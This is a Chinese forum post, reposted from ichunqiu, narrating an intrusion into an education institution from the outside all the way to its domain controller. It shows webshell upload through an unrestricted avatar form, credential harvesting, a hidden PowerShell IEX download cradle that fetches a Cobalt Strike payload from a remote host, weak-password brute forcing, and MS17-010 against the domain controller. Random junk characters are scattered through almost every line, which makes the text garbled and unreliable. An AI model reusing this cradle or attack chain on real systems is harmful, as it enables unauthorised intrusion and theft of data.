|
: x1 D. @% }- a% `! p
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路" @$ [2 X3 X. N
! c' [: E1 x; |0 j2 o1 r
; I" s! f$ l5 L! @) E# o8 D5 Y
" n6 H( ]- k8 }6 k
8 h+ C. A: F g: z! g' l
: ~* W. o" a h( }! ?5 q 正文
, ^. {7 f6 p, \5 |. v4 I 6 P1 h' \! @- P
9 e/ K4 {3 X$ k9 e3 F4 R9 T. X
2 C+ G9 b% t7 M6 [ 7 W0 l$ _# q$ }3 S! v w. J
; B3 a$ d# @5 q( n 目标:www.xxxx.com(一家教育机构)
( J; E* r: L5 j; \* X8 W F打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: O9 ~3 M7 B, U% P# n# |% r
) _. V( a$ z; V+ }2 Y5 B# Y
4 _3 `3 n/ u3 M 5 k! S1 [% p- `. Z) _
% O7 [$ ^- {9 e
# q* y) K# i9 y. ]4 V 进行了简单的信息搜集
" n7 A% L2 o( z, x3 i4 s
! c. t5 t% `: ?( ^! G) H( H& A, y) d; |5 ]
/ o, U5 p7 @+ q, V& _
3 v* }, \+ |/ K9 I
子域名搜集1 `, m% t+ {# N
" x8 M" q' @: P2 S! i$ o
3 q4 N" S- q7 |+ E. G5 p! s( c
7 Q! M8 u2 a q$ s0 I q4 H" W6 [5 ]
2 y& {, ~/ z# H4 |- r A) a, R' D4 z$ o
fofa找资产
% x' v& j; s$ e" S$ W/ \ 8 K. S" b! z E$ S" C6 G
. z z6 ~$ P! l ) w% |7 b# Y+ m5 r' }
( Y( Q0 I+ B3 Y# `8 T
7 M: s \2 p9 a% s x
/ w- ^1 d) }& j; \
% p, ^' K8 b1 E" e 一共七个资产。去重之后只有两个。 1 v* ?$ Z" k0 _* G
. j: ?9 z% A, `* b: }# E. M# ?+ V9 q) R& `( y7 K6 K! X5 n
8 n9 V( F# r9 ]8 t% h t) u1 }/ {
! T5 }1 H4 ?% Y4 J 目录探测
6 M. B0 { I* t9 a! W ' {% M4 Y) I4 K7 p
7 y- p; _6 b- p( E S8 G+ W& `! O
- X; i' p3 M) g9 o* [& y' ~6 l
' H( o- p, y+ X; `2 Q2 D7 m8 d8 l$ Y" L7 I( I8 u1 S
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 , f* p4 Y' _( {3 U% ~, f' l
7 x* v. O, j4 x; M0 G; j% f6 }
) G+ C2 u* d2 N0 B! X0 P. t
: m( m8 b. {6 { l
8 v0 f" |! Y/ O6 G# j: z
我又尝试了通过修改返回包来绕过登录界面9 q ]/ O8 C9 e
! a# n; a) q9 z( D8 |7 b. c, k: F& B) v4 U$ f$ A4 F
6 Q6 x/ V7 c3 `) R4 \- w
2 g6 g7 t9 Z- v
' K! `8 W9 k6 V! I% }9 Z% @ 还是不行,尝试注入无果9 Y/ r( i+ O% m( v6 d+ Z6 f. t
5 ]; ?# W0 ]' M- ^, {2 n+ H2 X( c, x: s9 K) g. f* l
' R8 p( x( A! a) }! W
|6 H" f4 R( ^( V) e5 L) g
. `5 a: u- U$ l, K8 p, T 不过我目录探测出了一处Spring信息泄露
7 Q j6 ]* s, Z( l, P
" ?, e0 Q1 X" {) D( Y
" P. M+ ^) C# Y! c' k g
: S* ?9 L9 _3 p/ d x5 l
+ V! S. R) U9 y3 N * T: q" @- Y+ F/ O: ^
6 Y, Q2 j# ~6 j$ D
6 I9 V6 X b- i9 M- \( P8 G5 n
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录: G7 \$ ~) S# b' ~
6 q1 S3 F0 i" u8 Y+ q3 @1 E
# w$ w% \# X) O
9 a9 ^3 j! @* V; V4 a0 `; m3 l
, J- v- [/ E/ Y1 k
1 m4 a3 b# N4 C+ t( m' W 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
# p a/ V T. R* F3 H % @+ r' D8 \. ]9 B6 K. f
0 \) o _, o/ {& e# \8 k/ l& d
D2 b0 `% l: |: o
% D. k8 V1 n$ { V: I) a
$ O H$ r# \" w6 [8 U! H3 _ 获取有些师傅到这一步就手机抓包电脑测了。
G; g- U. \4 W3 q7 M B& L
! T$ M( W! p; ~: T
8 @* u' N0 u* F G7 t) C4 O Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。: ^* g, q; b( t8 Z! s* O0 Y2 @
! b/ w- y- E2 @1 ?' u+ P7 m& d$ B3 J
其中在一个公众号发现了小程序,可以进行注册。! B; h( P0 a8 L& l. i2 G8 M
- c/ s# v5 z# y- [, w
' f& Y5 z% d9 i2 u8 L% q% D" N 看到了头像上传,尝试上传获取WebShell7 v2 d# A1 V3 [' G. o
5 r; g: Q+ P2 t3 q
* p" G9 g3 t; Q
: o% m6 B7 T9 O# {- N 5 [. T2 D/ k3 U- w7 c
1 `4 z( ?2 d9 k- [ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
+ P0 v' E5 b! J) E# v8 S) F6 F 7 ?/ t5 m2 ? L( S( U
$ F* I& h. O7 I) M* l5 v, P8 s
0 `/ I. [1 X+ k" R' o; Q, m
, `! `4 h3 Z w1 s3 H$ t8 D& [; I# \- _" Y" P/ O) y* d; E
然后上了大马" e$ l) b9 [* m, n: y# p0 P% J4 G
, Z2 z8 A7 V8 ?( e6 r
+ y7 u2 G. C6 p2 ~ 1 a# W: F2 S! w
3 W# i7 \6 d6 \ n4 z! t. F- I
, }: W7 ^5 i) a* n+ Z3 ^. u7 O g% c( l: V# s/ B* V
% |0 j" J& n6 e' g2 F1 t9 `. c9 p7 G
通过翻找文件发现数据库账号密码, A5 q% ? l- K0 X9 h
5 W, L! h+ X. c, E* I5 K9 b. ~# V
0 C" `$ S4 Q& t6 Z8 G
+ |/ T# a$ R; E+ ~4 z
[! }$ q! ^( [8 a
U6 h$ }7 {3 H* M8 y
--内网渗透* t* L% u- O% w4 a8 B ^
' i% l8 i3 t- c4 X9 O4 R e* b' m c E5 v
直接通过powershell执行 cs上线7 b$ T' Z( K4 r/ I4 y
9 {# K( r& f2 e6 k) k% ^4 g
; c8 s+ s. c) _6 w; ]' T, G8 U
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"' X3 O D9 U+ ^9 L
0 W9 Y3 P7 G" Q3 V* m+ Z0 u- T
# ]+ p0 @. C1 k M- F6 D+ s
/ p X. @- y$ d+ n# {# G$ K
2 ]" l2 d7 W- r% X% v/ I$ Z
7 \ v: S3 W+ x6 n 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
3 T; ^2 c* U7 ?2 ?3 P. V ( L( c" w$ a# O( v0 E
, p( y( W6 K% t* ~& T
; r2 Q$ b+ }" x; T2 b
1 l- o) W4 I" |9 C
. B8 L- S c% k7 y3 s2 q/ B% I 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 & P% @1 Y9 k7 C: T0 ~
" Y+ m! a' q, F) I& B
6 u8 L; X" ]7 g
9 p( A7 r- G7 o5 S/ J
+ v' T4 D; ~% i* T2 O
. q4 A: \" z, L. H 1 e, P! n, Q$ X, x* ^7 f
2 N! c: D2 {0 R. R- K
% U: Q5 J' l8 ~1 R: [1 ]
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
6 g/ k5 N6 k# d, {; B0 k
+ d+ d" r& W7 j* [6 n7 C
' ?! m" k |: U. j7 }" \ 8 s' T1 ?' E: M0 J
) z5 F E f1 a
( \& a. X# ]; z% w, ] s: G# q ( D5 S! O/ V# h, h+ P: A2 y
% g1 y* k }) Q+ o% J) ^ / V" B; y9 Z4 P3 g4 @: w
# L0 ?0 W+ N, @* a( s
' t- v0 i; h# N5 j5 ]/ T 3 p u) ^, V2 y( V3 I r; O
! w5 a3 O& d" L# M Z' o
, f: X3 a# @& B0 M' D! l! |( K 3 B3 {5 @0 O/ z" s& F8 Z8 I
: Y+ p3 Q1 u8 W; v. ~1 y 小结
3 z m8 Y5 t/ ]; H ! @+ I1 Y3 C1 O. r: A6 e
0 j4 \4 i' k# e- O* w
- w6 R6 v6 }+ D( p9 @
" J' i) T4 Y& H6 o# i3 B9 d7 v7 }
+ i+ } M& H0 w! V$ M 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!; F$ S+ ^* n+ a) I p
( b0 I9 e3 ^! Q% n* m3 Y2 U9 @: a, { H( t* \- k
7 P3 y6 U+ P) |7 r# L4 q
7 g( a/ o# I- O& [0 s6 l+ P1 F& n
- * b2 A. w2 F2 {+ F
+ `9 J! s( f* l6 o; _, }( p7 }3 n7 b
. h. h4 p: k3 T0 V
-
7 I- h' n! ^8 @9 g. U! j( a - D/ C) d( _ h' {/ t
8 ]+ q' ~' X! `5 K! O* L4 k# l) Q
/ H( p4 C; r3 w/ h
5 M# j2 C, q5 l9 ]. b" h 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ k/ l$ _- s' ]6 ~/ o6 n9 @4 |
* h' [1 K U4 X. h
& E% j3 `3 P5 `* d5 u4 G8 }" Y8 |
! Y7 Y v$ T9 F( X5 V/ J: W, w |